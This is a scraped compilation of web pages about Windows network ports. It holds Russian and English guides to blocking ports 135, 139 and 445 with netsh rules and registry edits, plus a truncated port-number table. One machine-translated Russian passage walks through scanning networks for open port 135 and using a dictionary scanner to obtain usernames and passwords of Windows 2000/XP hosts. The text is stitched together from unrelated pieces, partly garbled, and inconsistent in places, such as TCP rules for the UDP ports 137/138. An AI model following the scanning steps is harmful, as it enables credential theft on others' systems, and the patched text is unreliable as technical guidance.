* Использования других значений (кроме 0x0 или 0x20) может вызвать сбой в работе службы маршрутизации и удаленного доступа.

* Чтобы изменения вступили в силу, необходимо перезагрузить компьютер.

Информация в данной статье относится к следующим продуктам.

* Windows Vista Enterprise

* Windows Vista Enterprise 64-bit edition

* Windows Vista Home Basic 64-bit edition

* Windows Vista Home Premium 64-bit edition

* Windows Vista Ultimate 64-bit edition

* Windows Vista Business

* Windows Vista Business 64-bit edition

* Windows Vista Home Basic

* Windows Vista Home Premium

* Windows Vista Starter

* Windows Vista Ultimate

* Windows 7 Enterprise

* Windows 7 Home Basic

* Windows 7 Home Premium

* Windows 7 Professional

* Windows 7 Ultimate

* Windows Server 2008 R2 Datacenter

* Windows Server 2008 R2 Enterprise

* Windows Server 2008 R2 Standard

* Windows Server 2008 Datacenter

* Windows Server 2008 Enterprise

* Windows Server 2008 Standard

Источник — http://support.microsoft.com/kb/929852

После отключения и перезагрузки у вас из списка, получаемого командой ipconfig /all
исчезнет куча лишних строк и останутся только хорошо известные вам интерфейсы.

Обратное включение выполняется простым удалением созданного ключа из реестра или заменой значения на «0» с последующей перезагрузкой.

Каждый день владельцы ПК сталкиваются с огромным количеством опасных программ и вирусов, которые так или иначе попадают на жесткий диск и становятся причиной утечки важных данных, поломки компьютера, кражи важной информации и других неприятных ситуаций.

Чаще всего заражаются компьютеры, работающие на ОС Windows любых версий, будь то 7, 8, 10 или любая другая. Главная причина такой статистики – входящие подключения к ПК или «порты», которые являются слабым местом любой системы из-за своей доступности по умолчанию.

Слово «порт» – это термин, подразумевающий порядковый номер входящих подключений, которые направляются на ваш ПК от внешнего программного обеспечения. Часто бывает так, что эти порты используют вирусы, запросто проникающие на ваш компьютер при помощи IP-сети.

Вирусное программное обеспечение, попав в компьютер через такие входящие подключения, быстро заражает все важные файлы, причём не только пользовательские, но и системные. Чтобы этого избежать, мы рекомендуем закрыть все стандартные порты, которые могут стать вашим уязвимым местом при атаке хакеров.

Какие порты у Windows 7-10 самые уязвимые?

Многочисленные исследования и опросы специалистов показывают, что до 80% вредоносных атак и взломов происходили при помощи четырех основных портов, использующихся для быстрого обмена файлами между разными версиями Windows:

  • TCP порт 139, необходимый для удаленного подключения и управления ПК;
  • TCP порт 135, предназначенный для выполнения команд;
  • TCP порт 445, позволяющий быстро передавать файлы;
  • UDP порт 137, с помощью которого проводится быстрый поиск на ПК.

Закрываем порты 135-139 и 445 в Виндовс

Мы предлагаем вам ознакомиться с самыми простыми способами закрытия портов Виндовс, которые не требуют дополнительных знаний и профессиональных навыков.

Используем командную строку

Командная строка Windows – это программная оболочка, которая используется для задания определенных функций и параметров софту, не имеющему собственной графической оболочки.

Для того чтобы запустить командную строку, необходимо:

  1. Одновременно нажать сочетание клавиш Win+R
  2. В появившейся командной строке ввести CMD
  3. Нажать на кнопку «ОК»

Появится рабочее окно с чёрным фоном, в котором необходимо поочередно вводить нижеприведенные команды. После каждой введенной строчки нажимайте клавишу Enter для подтверждения действия.
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=135 name=»Block1_TCP-135″
(команда для закрытия порта 135)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=137 name=»Block1_TCP-137″
(команда для закрытия порта 137)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=138 name=»Block1_TCP-138″
(команда для закрытия порта 138)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=139 name=»Block_TCP-139″
(команда для закрытия порта 139)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=445 name=»Block_TCP-445″
(команда для закрытия порта 445)
netsh advfirewall firewall add rule dir=in action=block protocol=tcp localport=5000 name=»Block_TCP-5000″

Шесть приведенных нами команд необходимы для: закрытия 4х уязвимых TCP-портов Windows (открытых по умолчанию), закрытия UDP-порта 138, а также закрытия порта 5000, который отвечает за выведение списка доступных сервисов.

Закрываем порты сторонними программами

Если вы не хотите тратить время на работу с командной строкой, мы предлагаем вам ознакомиться со сторонними приложениями. Суть такого софта заключается в правке реестра в автоматическом режиме с графическим интерфейсом, без необходимости в ручном введении команд.

По мнению наших пользователей, самой популярной программой для этих целей является Windows Doors Cleaner. Она поможет с лёгкостью закрыть порты на компьютере с ОС Windows 7/8/8.1/10. Более старые версии операционных систем, к сожалению, не поддерживаются.

Как работать с программой, закрывающей порты

Для того чтобы воспользоваться Windows Doors Cleaner, необходимо:

1. Скачать софт и установить его
2. Запустить программу, нажав на ярлык правой кнопкой мыши и выбрав «запустить от имени администратора»
3. В появившемся рабочем окне будет список портов и кнопки «Сlose» или «Disable», которые закрывают уязвимые порты Windows, а также любые другие по желанию
4. После того, как необходимые изменения были внесены, необходимо перезагрузить систему

Ещё одним преимуществом программы является тот факт, что порты с её помощью можно не только закрывать, но и открывать.

Делаем выводы

Закрытие уязвимых сетевых портов в Виндовс – это не панацея от всех бед. Важно помнить, что сетевая безопасность может быть достигнута только комплексными действиями, нацеленными на закрытие всех уязвимостей вашего ПК.

Для безопасности Windows пользователь в обязательном порядке должен устанавливать критические обновления от Microsoft, иметь лицензированных антивирусный софт и включенный файервол, использовать исключительно безопасное программное обеспечение и регулярно читать наши статьи, в которых рассказываем обо всех существующих способах достижения анонимности и безопасности ваших данных.

Вы знаете более удобные способы закрыть сетевые порты? Поделитесь своими знаниями в комментариях и не забывайте репостить статью к себе на страничку. Делитесь полезной информацией со своими друзьями и не дайте хакерам шанса навредить вашим близким!

Поняв порт 135, я знаю, что этот порт является портом с высоким риском и что в нем есть некоторые лазейки. Я хочу сказать, что использовать лазейки в порту 135 для подключения к внутренней сетиИмя пользователя и пароль хоста системы Windows 2000 и Windows XP.

Обзор 135 портов:

Microsoft запускает DCE RPC end-point mapper на этом порту для своей службы DCOM. Это очень похоже на функцию порта UNIX 111. Службы, использующие DCOM и RPC, используют сопоставитель конечных точек на компьютере для регистрации своего местоположения. Когда удаленные клиенты подключаются к компьютеру, они обращаются к сопоставителю конечных точек, чтобы найти расположение службы.Порт 135 в основном используется для использования протокола RPC (RemoteProcedureCall) и предоставления услуг DCOM (объектная модель распределенных компонентов). С помощью RPC можно гарантировать, что программа, запущенная на компьютере, может беспрепятственно выполнять код на удаленном компьютере; используйте DCOM может связываться напрямую через сеть и передавать данные по нескольким сетям, включая протокол HTTP.

135Уязвимость порта:

РанееМногие пользователи Windows 2000 и Windows XP были заражены вирусом Shockwave, который использует уязвимости RPC для атаки на компьютеры. Сам RPC имеет лазейку в процессе обмена сообщениями по TCP / IP, которая вызвана неправильной обработкой сообщений с некорректным форматом. Уязвимость затронет интерфейс между RPC и DCOM, порт прослушивания на этом интерфейсе — 135.

Актуальный бой:

Step1:использоватьКакиеDСетевые инструментыупаковкаПакетное сканирование для вторжения 135портСегмент сетиХозяин

Шаг 2: Скопируйте открытый порт 135 сканирования IP вФайл

Шаг 3. Откройте сканер неисправностей NETSCAN, выберите файл для копирования IP, установите интервал IP, установите порт 135 и начните сканирование.

PS: (словарь аномального сканера NETSCAN можно изменить, лучше выбрать мощный словарь)

Это видно из результатов приведенного выше рисунка:полнооткрыто135 портWindows 2000 и Windows XPИмя пользователя и пароль системного хоста.

Ports are channels through which information can be transferred. Contrary to the common perception of hardware ports such as a USB port, the article is in fact about software port 135. But they do share some sort of similarity in their function.

The article is about one port, in particular, port 135. You probably have a lot of questions about this port in your mind since there is not much-organized info about the port on the internet. So in this article, we will go over the basic meanings of software ports, port 135 and a bunch of related terms. We will also show you why and how you can close the port. 

Contents

  • 1 What exactly is a port?
    • 1.1 TCP and UDP
  • 2 What is Port 135?
    • 2.1 Port 135 exploit
  • 3 How to check live status of port 135?
  • 4 How to close port 135 Windows?
    • 4.1 Method 1: Using Windows Firewall
    • 4.2 Method 2: Using Registry Editor

What exactly is a port?

There is no way that you are not familiar with the term ‘ports’ when it comes to hardware. Indeed you must have used a USB port at some point in your life. A port is an interface between your computer and external devices such as printers, mobiles, portable storage devices or other computers. They make use of data cables or chords to establish a link through which the flow of information takes place. But the topic at hand is not about these ports. 

The ports that we mean have a software origin. Nonetheless, they serve the same purpose. These ports are locations to which data can be sent. They also do the job of recognizing this data and then handling them as required. But to put it more technically, ports are logical constructs in an operating system to identify a specific process or network. The port in the discussion, i.e port 135, is one of the many used in Windows OS.

TCP and UDP

Regardless of what kind of port you are going to read about, you will surely come across these two words a lot. So, it is obvious that you need to get a good grasp of what they actually mean. These terms are associated with the dispatch of bits of data otherwise called packets.

TCP vs UDP

First, they travel from your computer to your router. Thereafter, these packets make way to a particular IP address. The first one, TCP, stands for Transmission Control Protocol. It is the protocol that makes it possible for you to mess around with the internet as you do.

When you search for something using a browser, you are actually trying to get into a new webpage. So, TCP sends a particular set of packets to the server’s address. Consequently, the server transmits a response likewise. The data received is then rearranged, like solving a puzzle, and you finally get into the web page. 

The word, UDP, stands for User Datagram Protocol. It uses datagram for the dispatch of data and it is rather similar to packets. The key difference between UDP and TCP is that UDP will keep on sending one set of data after the other without caring about receiving responses.

On the other hand, TCP will resend a packet if it does not receive a response. Hence TCP is more responsible. Furthermore, checks the data it transmits for errors or corruption. But by eliminating the checking and receiving response processes, UDP is certainly a lot faster of the two.

What is Port 135?

port 135

It is the port that is mainly used in client-server relations, one among several ports that are used in the Windows Operating System. Client-server relation is one where a party called client, you in the majority of the time, requests for the particular information or access to a particular area and the server provides it. It is also closely involved with RPC and DCOM. 

RPC stands for Remote Procedure Call. When you perform an action on your computer, your CPU runs the required procedures for it. Whereas in remote procedure call when you perform an action, its procedure can be run by some other computer or device in the network.

DCOM stands or Distributed Component Object Model and it consists of several programs and concepts that help the client program to send requests to the server in a Windows Operating System environment. Port 135 is one of the main interfaces that help out DCOM.

Port 135 exploit

While being very useful and essential to the working of your computer, ports, in general, are gateways to your system. Hence an open port may just what an outside may be looking for in order to extract your private information or to infect your system.

All the services and applications in your PC can, therefore, become an easy target. You certainly can’t risk opening Port 135 to the internet unnecessarily. There are hacking tools out there than can easily recognize the DCOM related activities in your system and easily exploit vulnerabilities. 

How to check live status of port 135?

Before going through the whole procedure of closing a port you might want to first check if the port is actually open or not. You can use the Command prompt to achieve this without much hassle. In fact, the following procedure will give you the details of several ports or not. It is the fastest way to find out if ports are listening or not.

  1. Use your keyboard to press the Windows key and R key simultaneously.
  2. The Run dialogue box will appear. In the space against open, type in cmd and then press Enter or choose OK. Alternatively, you can use the Windows Search bar to look for cmd or Command prompt. 
  3. Once the command prompt opens, type the following command and press Enter: netstat -na

tcp port 135

The process of scanning all the ports of your port occurs next and it completes in the blink of an eye. You will be quickly shown the results on the screen. Find tcp port 135 under the local address column and if its state says “LISTENING” then it will be open. 

How to close port 135 Windows?

At first, there is no absolute need for disabling port 135 for normal PC users. But if you are working around pirated, cracked versions of software regularly, you may want to disable TCP port 135 to avoid intrusion of harmful ransomware like WannaCry.

Method 1: Using Windows Firewall

This is the easiest method out there to close this port. It may seem a little wordy and long but don’t worry. Because most steps just include clicking options kind of how you install a game on your computer.

  1. Place the cursor on the Windows Search bar. 
  2. Now, type in Control Panel and then press the Enter button.
  3. You will quickly get the search results. Open the app form them.
  4. Here you can see several tiles. Proceed to choose the System and Security option. 
  5. Next, select Windows Defender Firewall.
  6. On the left pane, you will see an option called Advanced settings with a small shield icon. Choose it. 
  7. Look at the left side yet again, there will be a lot of tiles. From them, choose the Inbound Rules option.
  8. This time around, look at the right side. And then select the New Rule option once you find it.
  9. A new window will open. Here you have to select the Port option and then hit Next.
  10. You will be faced with two questions. For the first one, you would want to choose TCP.
  11. For the second one choose Specific local ports and type in 135 in the accompanying space. Hit Next once you are done.
  12. On the next page go right ahead and choose the Block the connection option and then proceed with Next.
  13. Be sure to tick in the three checkboxes provided and then go on to the next page.
  14. Give it a name and description as you wish and then bring it home by hitting Finish.
  15. If you want to check the rules that you just set up open its properties.
  16. Click on the Protocols and Ports tab.
  17. Now you can check under Local Port.

In some cases, the Port will only close after a reboot.

Method 2: Using Registry Editor

The Registry editor is a pretty neat tool that you can use to modify a lot of programs on your PC. But do keep in mind that it is a database for all the system files and installed applications on your computer. Therefore be very careful while operating it.

  1. Open the Run dialogue box by pressing the Windows key and R key on your keyboard simultaneously. 
  2. In the space beside open, type in Regedit and then press OK or hit Enter. (You can always use the windows search bar instead. Just type in Registry editor or Regedit and hit enter. Then you can find it in the search results.)
  3. On the navigation pane on your left side, expand the HKEY_LOCAL_MACHINE by using a double-click. 
  4. Now look for the SOFTWARE file under it and expand it as well.
  5. Similarly, expand the Microsoft file and then proceed to open the Ole key under Microsoft.
  6. Look to the right side of the screen. Double click on the EnableDCOM option.
  7. Once it opens, change its data value from  Y to N.
  8. Once this is done, navigate to this registry key: HKEY_LOCAL_MACHINE SOFTWARE Microsoft RPC
  9. On the right side, double-click on the DCOM Protocols option. You will see some data under the value data tab. Select it all and then delete it. This will leave it blank and that’s the way you need it to be. 
  10. Port 135 has now been closed.

what is port 135

To disable other programs or services related to DCM, follow Control Panel >> Administrative Tools >> Services. Then disable these services: COM+ Event System, COM + System Application and, System Event Notification.

Wrapping up,

You have now learned a decent bit about port 135. We have also discussed checking port listening and closing the port. Do try out some tinkering with it if you need to. But careful though and you should know what you are doing.

Port TCP UDP SCTP DCCP Description 1024 Reserved Reserved Reserved 1025 Yes Yes Teradata database management system (Teradata) server 1027 Reserved Reserved Yes Native IPv6 behind IPv4-to-IPv4 NAT Customer Premises Equipment (6a44)[121] 1028 Reserved[2] 1029 Unofficial Microsoft DCOM services 1058 Yes Yes nim, IBM AIX Network Installation Manager (NIM) 1059 Yes Yes nimreg, IBM AIX Network Installation Manager (NIM) 1080 Yes Yes SOCKS proxy 1085 Yes Yes WebObjects[11] 1098 Yes Yes rmiactivation, Java remote method invocation (RMI) activation 1099 Yes Assigned rmiregistry, Java remote method invocation (RMI) registry 1109 Reserved Reserved Reserved 1113 Assigned
[note 2][122] Yes[123] Licklider Transmission Protocol (LTP) delay tolerant networking protocol 1119 Yes Yes Battle.net chat/game protocol, used by Blizzard’s games[124] 1167 Yes Yes Yes Cisco IP SLA (Service Assurance Agent) 1194 Yes Yes OpenVPN 1198 Yes Yes The cajo project Free dynamic transparent distributed computing in Java 1212 Unofficial Unofficial Equalsocial Fediverse protocol 1214 Yes Yes Kazaa 1220 Yes Assigned QuickTime Streaming Server administration[11] 1234 Yes Yes Infoseek search agent Unofficial VLC media player default port for UDP/RTP stream 1241 Unofficial Unofficial Nessus Security Scanner 1270 Yes Yes Microsoft System Center Operations Manager (SCOM) (formerly Microsoft Operations Manager (MOM)) agent 1293 Yes Yes Internet Protocol Security (IPSec) 1311 Yes Yes Windows RxMon.exe Unofficial Dell OpenManage HTTPS[125] 1314 Unofficial Festival Speech Synthesis System server[126] 1319 Yes Yes AMX ICSP (Protocol for communications with AMX control systems devices) 1337 Yes Yes Men&Mice DNS[127] Unofficial Strapi[128] Unofficial Sails.js default port[129] 1341 Yes Yes Qubes (Manufacturing Execution System) 1344 Yes Yes Internet Content Adaptation Protocol 1352 Yes Yes IBM Lotus Notes/Domino (RPC) protocol 1360 Yes Yes Mimer SQL 1414 Yes Yes IBM WebSphere MQ (formerly known as MQSeries) 1417 Yes Yes Timbuktu Service 1 Port 1418 Yes Yes Timbuktu Service 2 Port 1419 Yes Yes Timbuktu Service 3 Port 1420 Yes Yes Timbuktu Service 4 Port 1431 Yes Reverse Gossip Transport Protocol (RGTP), used to access a General-purpose Reverse-Ordered Gossip Gathering System (GROGGS) bulletin board, such as that implemented on the Cambridge University’s Phoenix system 1433 Yes Yes Microsoft SQL Server database management system (MSSQL) server 1434 Yes Yes Microsoft SQL Server database management system (MSSQL) monitor 1476 Yes Yes WiFi Pineapple Hak5. 1481 Yes Yes AIRS data interchange. 1492 Unofficial Sid Meier’s CivNet, a multiplayer remake of the original Sid Meier’s Civilization game[citation needed] 1494 Unofficial Unofficial Citrix Independent Computing Architecture (ICA)[130] 1500 Unofficial IBM Tivoli Storage Manager server[131] 1501 Unofficial IBM Tivoli Storage Manager client scheduler[131] 1503 Unofficial Unofficial Windows Live Messenger (Whiteboard and Application Sharing)[132] 1512 Yes Yes Microsoft’s Windows Internet Name Service (WINS) 1513 Unofficial Unofficial Garena game client[citation needed] 1521 Yes Yes nCUBE License Manager Unofficial Oracle database default listener, in future releases[when?][133] official port 2483 (TCP/IP) and 2484 (TCP/IP with SSL) 1524 Yes Yes ingreslock, ingres 1527 Yes Yes Oracle Net Services, formerly known as SQL*Net[134] Unofficial Apache Derby Network Server[135] 1533 Yes Yes IBM Sametime Virtual Places Chat 1534 No Unofficial Eclipse Target Communication Framework[136] 1540 Unofficial Unofficial 1C:Enterprise server agent (ragent)[137][138] 1541 Unofficial Unofficial 1C:Enterprise master cluster manager (rmngr)[137] 1542 Unofficial Unofficial 1C:Enterprise configuration repository server[137] 1545 Unofficial Unofficial 1C:Enterprise cluster administration server (RAS)[137] 1547 Yes Yes Laplink 1550 Unofficial Unofficial 1C:Enterprise debug server[137] Unofficial Gadu-Gadu (direct client-to-client)[citation needed] 1560–1590 Unofficial Unofficial 1C:Enterprise cluster working processes[137] 1581 Yes Yes MIL STD 2045-47001 VMF Unofficial IBM Tivoli Storage Manager web client[131] 1582–1583 Unofficial IBM Tivoli Storage Manager server web interface[131] 1583 Unofficial Pervasive PSQL[139] 1589 Yes Yes Cisco VLAN Query Protocol (VQP) 1604 Unofficial Unofficial DarkComet remote administration tool (RAT)[citation needed] 1626 Unofficial iSketch[140] 1627 Unofficial iSketch[140] 1628 Yes Yes LonTalk normal 1629 Yes Yes LonTalk urgent 1645 No Unofficial Early deployment of RADIUS before RFC standardization was done using UDP port number 1645. Enabled for compatibility reasons by default on Cisco[citation needed] and Juniper Networks RADIUS servers.[141] Official port is 1812. TCP port 1645 must not be used.[142] 1646 No Unofficial Old radacct port,[when?] RADIUS accounting protocol. Enabled for compatibility reasons by default on Cisco[citation needed] and Juniper Networks RADIUS servers.[141] Official port is 1813. TCP port 1646 must not be used.[142] 1666 Unofficial Perforce[143] 1677 Yes Yes Novell GroupWise clients in client/server access mode 1688 Unofficial Microsoft Key Management Service (KMS) for Windows Activation[144] 1701 Yes Yes Layer 2 Forwarding Protocol (L2F) Assigned Yes Layer 2 Tunneling Protocol (L2TP)[11] 1707 Yes Yes Windward Studios games (vdmplay) Unofficial L2TP/IPsec, for establish an initial connection[145] 1714–1764 Unofficial Unofficial KDE Connect[146] 1716 Unofficial America’s Army, a massively multiplayer online game (MMO)[147] 1719 Yes Yes H.323 registration and alternate communication 1720 Yes Yes H.323 call signaling 1723 Yes Assigned Point-to-Point Tunneling Protocol (PPTP)[11] 1755 Yes Yes Microsoft Media Services (MMS, ms-streaming) 1761 Unofficial Unofficial Novell ZENworks[148][149] 1776 Yes Emergency management information system 1783 Reserved «Decomissioned [sic] Port 04/14/00, ms»[2] 1801 Yes Yes Microsoft Message Queuing 1812 Yes Yes RADIUS authentication protocol, radius 1813 Yes Yes RADIUS accounting protocol, radius-acct 1863 Yes Yes Microsoft Notification Protocol (MSNP), used by the Microsoft Messenger service and a number of instant messaging Messenger clients 1880 Unofficial Node-RED[150] 1883 Yes Yes MQTT (formerly MQ Telemetry Transport) 1900 Assigned Yes Simple Service Discovery Protocol (SSDP),[11] discovery of UPnP devices 1935 Yes Yes Macromedia Flash Communications Server MX, the precursor to Adobe Flash Media Server before Macromedia’s acquisition by Adobe on December 3, 2005 Unofficial Unofficial Real Time Messaging Protocol (RTMP)[citation needed], primarily used in Adobe Flash[151] 1965 Unofficial No Gemini, a lightweight, collaboratively designed protocol, striving to fill the gap between Gopher and HTTP[152] 1967 Unofficial Cisco IOS IP Service Level Agreements (IP SLAs) Control Protocol[citation needed] 1972 Yes Yes InterSystems Caché, and InterSystems IRIS versions 2020.3 and later 1984 Yes Yes Big Brother 1985 Assigned Yes Cisco Hot Standby Router Protocol (HSRP)[153][self-published source] 1998 Yes Yes Cisco X.25 over TCP (XOT) service 2000 Yes Yes Cisco Skinny Client Control Protocol (SCCP) 2010 Unofficial Artemis: Spaceship Bridge Simulator[154] 2033 Unofficial Unofficial Civilization IV multiplayer[155] 2049 Yes Yes Yes Network File System (NFS)[11] 2056 Unofficial Unofficial Civilization IV multiplayer[155] 2080 Yes Yes Autodesk NLM (FLEXlm) 2082 Unofficial cPanel default[156] 2083 Yes Yes Secure RADIUS Service (radsec) Unofficial cPanel default SSL[156] 2086 Yes Yes GNUnet Unofficial WebHost Manager default[156] 2087 Unofficial WebHost Manager default SSL[156] 2095 Yes cPanel default web mail[156] 2096 Unofficial cPanel default SSL web mail[156] 2100 Unofficial Warzone 2100 multiplayer[citation needed] 2101 Unofficial Networked Transport of RTCM via Internet Protocol (NTRIP)[citation needed] 2102 Yes Yes Zephyr Notification Service server 2103 Yes Yes Zephyr Notification Service serv-hm connection 2104 Yes Yes Zephyr Notification Service hostmanager 2123 Yes Yes GTP control messages (GTP-C) 2142 Yes Yes TDMoIP (TDM over IP) 2152 Yes Yes GTP user data messages (GTP-U) 2159 Yes Yes GDB remote debug port 2181 Yes Yes EForward-document transport system Unofficial Apache ZooKeeper default client port[citation needed] 2195 Unofficial Apple Push Notification Service, binary, gateway.[11][157] Deprecated March 2021.[158] 2196 Unofficial Apple Push Notification Service, binary, feedback.[11][157] Deprecated March 2021.[158] 2197 Unofficial Apple Push Notification Service, HTTP/2, JSON-based API. 2210 Yes Yes NOAAPORT Broadcast Network 2211 Yes Yes EMWIN 2221 Unofficial ESET anti-virus updates[159] 2222 Yes Yes EtherNet/IP implicit messaging for IO data Unofficial DirectAdmin Access[160] 2222–2226 Yes ESET Remote administrator[159] 2240 Yes Yes General Dynamics Remote Encryptor Configuration Information Protocol (RECIPe) 2261 Yes Yes CoMotion master 2262 Yes Yes CoMotion backup 2302 Unofficial ArmA multiplayer[161] Unofficial Halo: Combat Evolved multiplayer host[162] 2303 Unofficial ArmA multiplayer (default port for game +1)[161] Unofficial Halo: Combat Evolved multiplayer listener[162] 2305 Unofficial ArmA multiplayer (default port for game +3)[161] 2351 Unofficial AIM game LAN network port[citation needed] 2368 Unofficial Ghost (blogging platform)[163] 2369 Unofficial Default for BMC Control-M/Server Configuration Agent 2370 Unofficial Default for BMC Control-M/Server, to allow the Control-M/Enterprise Manager to connect to the Control-M/Server 2372 Unofficial Default for K9 Web Protection/parental controls, content filtering agent[citation needed] 2375 Yes Reserved Docker REST API (plain) 2376 Yes Reserved Docker REST API (SSL) 2377 Yes Reserved Docker Swarm cluster management communications[164][self-published source] 2379 Yes Reserved CoreOS etcd client communication Unofficial KGS Go Server[165] 2380 Yes Reserved CoreOS etcd server communication 2389 Assigned OpenView Session Mgr 2399 Yes Yes FileMaker Data Access Layer (ODBC/JDBC) 2401 Yes Yes CVS version control system password-based server 2404 Yes Yes IEC 60870-5-104, used to send electric power telecontrol messages between two systems via directly connected data circuits 2424 Unofficial OrientDB database listening for binary client connections[166] 2427 Yes Yes Media Gateway Control Protocol (MGCP) media gateway 2447 Yes Yes ovwdb—OpenView Network Node Manager (NNM) daemon 2456 Unofficial Unofficial Valheim 2459 Yes Yes XRPL 2480 Unofficial OrientDB database listening for HTTP client connections[166] 2483 Yes Yes Oracle database listening for insecure client connections to the listener, replaces port 1521[when?] 2484 Yes Yes Oracle database listening for SSL client connections to the listener 2500 Unofficial Unofficial NetFS communication[167] 2501 Unofficial NetFS probe 2535 Yes Yes Multicast Address Dynamic Client Allocation Protocol (MADCAP).[168] All standard messages are UDP datagrams.[169] 2541 Yes Yes LonTalk/IP 2546–2548 Yes Yes EVault data protection services 2593 Unofficial Unofficial Ultima Online servers[citation needed] 2598 Unofficial Citrix Independent Computing Architecture (ICA) with Session Reliability; port 1494 without session reliability[130] 2599 Unofficial Unofficial Ultima Online servers[citation needed] 2628 Yes Yes DICT[170] 2638 Yes Yes SQL Anywhere database server[171][172] 2710 Unofficial Unofficial XBT Tracker.[173] UDP tracker extension is considered experimental.[174] 2727 Yes Yes Media Gateway Control Protocol (MGCP) media gateway controller (call agent) 2775 Yes Yes Short Message Peer-to-Peer (SMPP)[citation needed] 2809 Yes Yes corbaloc:iiop URL, per the CORBA 3.0.3 specification 2811 Yes Yes gsi ftp, per the GridFTP specification 2827 Unofficial I2P BOB Bridge[175] 2944 Yes Yes Megaco text H.248 2945 Yes Yes Megaco binary (ASN.1) H.248 2947 Yes Yes gpsd, GPS daemon 2948–2949 Yes Yes WAP push Multimedia Messaging Service (MMS) 2967 Yes Yes Symantec System Center agent (SSC-AGENT) 3000 Unofficial Ruby on Rails development default[176] Unofficial Meteor development default[177][failed verification] Unofficial Unofficial Resilio Sync,[178] spun from BitTorrent Sync. Unofficial Create React App, script to create single-page React applications[179] Unofficial Gogs (self-hosted GIT service) [180] Unofficial Grafana[181] 3001 Yes No Honeywell Prowatch[182] 3004 Unofficial iSync[11] 3010 Yes Yes KWS Connector 3020 Yes Yes Common Internet File System (CIFS). See also port 445 for Server Message Block (SMB), a dialect of CIFS. 3050 Yes Yes gds-db (Interbase/Firebird databases) 3052 Yes Yes APC PowerChute Network 3074 Yes Yes Xbox LIVE and Games for Windows – Live 3101 Unofficial BlackBerry Enterprise Server communication protocol[183] 3128 Unofficial No Squid caching web proxy[184] 3225 Yes Yes Fibre Channel over IP (FCIP) 3233 Yes Yes WhiskerControl research control protocol 3260 Yes Yes iSCSI 3268 Yes Yes msft-gc, Microsoft Global Catalog (LDAP service which contains data from Active Directory forests) 3269 Yes Yes msft-gc-ssl, Microsoft Global Catalog over SSL (similar to port 3268, LDAP over SSL) 3283 Yes Yes Net Assistant,[11] a predecessor to Apple Remote Desktop Unofficial Unofficial Apple Remote Desktop 2.0 or later[11] 3290 Unofficial Virtual Air Traffic Simulation (VATSIM) network voice communication[citation needed] 3305 Yes Yes Odette File Transfer Protocol (OFTP) 3306 Yes Assigned MySQL database system[11] 3323 Unofficial Unofficial DECE GEODI Server 3332 Unofficial Thundercloud DataPath Overlay Control 3333 Unofficial Eggdrop, an IRC bot default port[185] Unofficial Network Caller ID server Unofficial CruiseControl.rb[186] Unofficial OpenOCD (gdbserver)[187] 3351 Unofficial Pervasive PSQL[139] 3386 Yes Yes GTP’ 3GPP GSM/UMTS CDR logging protocol 3389 Yes Yes Microsoft Terminal Server (RDP) officially registered as Windows Based Terminal (WBT)[188] 3396 Yes Yes Novell NDPS Printer Agent 3412 Yes Yes xmlBlaster 3423 Yes Xware xTrm Communication Protocol 3424 Yes Xware xTrm Communication Protocol over SSL 3435 Yes Yes Pacom Security User Port 3455 Yes Yes Resource Reservation Protocol (RSVP) 3478 Yes Yes STUN, a protocol for NAT traversal[189] Yes Yes TURN, a protocol for NAT traversal[190] (extension to STUN) Yes Yes STUN Behavior Discovery.[191] See also port 5349. 3479 Unofficial Unofficial PlayStation Network[192] 3480 Unofficial Unofficial PlayStation Network[192] 3483 Yes Slim Devices discovery protocol Yes Slim Devices SlimProto protocol 3493 Yes Yes Network UPS Tools (NUT) 3503 Yes Yes MPLS LSP-echo Port 3516 Yes Yes Smartcard Port 3527 Yes Microsoft Message Queuing 3535 Unofficial SMTP alternate[193] 3544 Yes Teredo tunneling 3551 Yes Yes Apcupsd Information Port [194] 3601 Yes SAP Message Server Port[195] 3632 Yes Assigned Distcc, distributed compiler[11] 3645 Yes Yes Cyc 3659 Yes Yes Apple SASL, used by macOS Server Password Server[11] Unofficial Battlefield 4 3667 Yes Yes Information Exchange 3671 Yes Yes KNXnet/IP(EIBnet/IP) 3689 Yes Assigned Digital Audio Access Protocol (DAAP), used by Apple’s iTunes and AirPlay[11] 3690 Yes Yes Subversion (SVN)[11] version control system 3702 Yes Yes Web Services Dynamic Discovery (WS-Discovery), used by various components of Windows Vista and later 3724 Yes Yes Some Blizzard games[124] Unofficial Club Penguin Disney online game for kids 3725 Yes Yes Netia NA-ER Port 3749 Yes Yes CimTrak registered port 3768 Yes Yes RBLcheckd server daemon 3784 Yes Bidirectional Forwarding Detection (BFD)for IPv4 and IPv6 (Single Hop) (RFC 5881) 3785 Unofficial VoIP program used by Ventrilo 3799 Yes RADIUS change of authorization 3804 Yes Yes Harman Professional HiQnet protocol 3825 Unofficial RedSeal Networks client/server connection[citation needed] 3826 Yes Yes WarMUX game server Unofficial RedSeal Networks client/server connection[citation needed] 3835 Unofficial RedSeal Networks client/server connection[citation needed] 3830 Yes Yes System Management Agent, developed and used by Cerner to monitor and manage solutions 3856 Unofficial Unofficial ERP Server Application used by F10 Software 3880 Yes Yes IGRS 3868 Yes Yes Diameter base protocol (RFC 3588) 3872 Yes Oracle Enterprise Manager Remote Agent 3900 Yes udt_os, IBM UniData UDT OS[196] 3960 Unofficial Warframe online interaction[citation needed] 3962 Unofficial Warframe online interaction[citation needed] 3978 Unofficial Unofficial OpenTTD game (masterserver and content service) 3978 Unofficial Palo Alto Networks’ Panorama management of firewalls and log collectors & pre-PAN-OS 8.0 Panorama-to-managed devices software updates.[197] 3979 Unofficial Unofficial OpenTTD game 3999 Yes Yes Norman distributed scanning service 4000 Unofficial Unofficial Diablo II game 4001 Unofficial Microsoft Ants game Unofficial CoreOS etcd client communication 4018 Yes Yes Protocol information and warnings[clarification needed] 4035 Unofficial IBM Rational Developer for System z Remote System Explorer Daemon 4045 Unofficial Unofficial Solaris lockd NFS lock daemon/manager 4050 Unofficial Mud Master Chat protocol (MMCP) — Peer-to-peer communications between MUD clients.[198] 4069 Yes Minger Email Address Verification Protocol[199] 4070 Unofficial Unofficial Amazon Echo Dot (Amazon Alexa) streaming connection with Spotify[200] 4089 Yes Yes OpenCORE Remote Control Service 4090 Yes Yes Kerio 4093 Yes Yes PxPlus Client server interface ProvideX 4096 Yes Yes Ascom Timeplex Bridge Relay Element (BRE) 4105 Yes Yes Shofar (ShofarNexus) 4111 Yes Assigned Xgrid[11] 4116 Yes 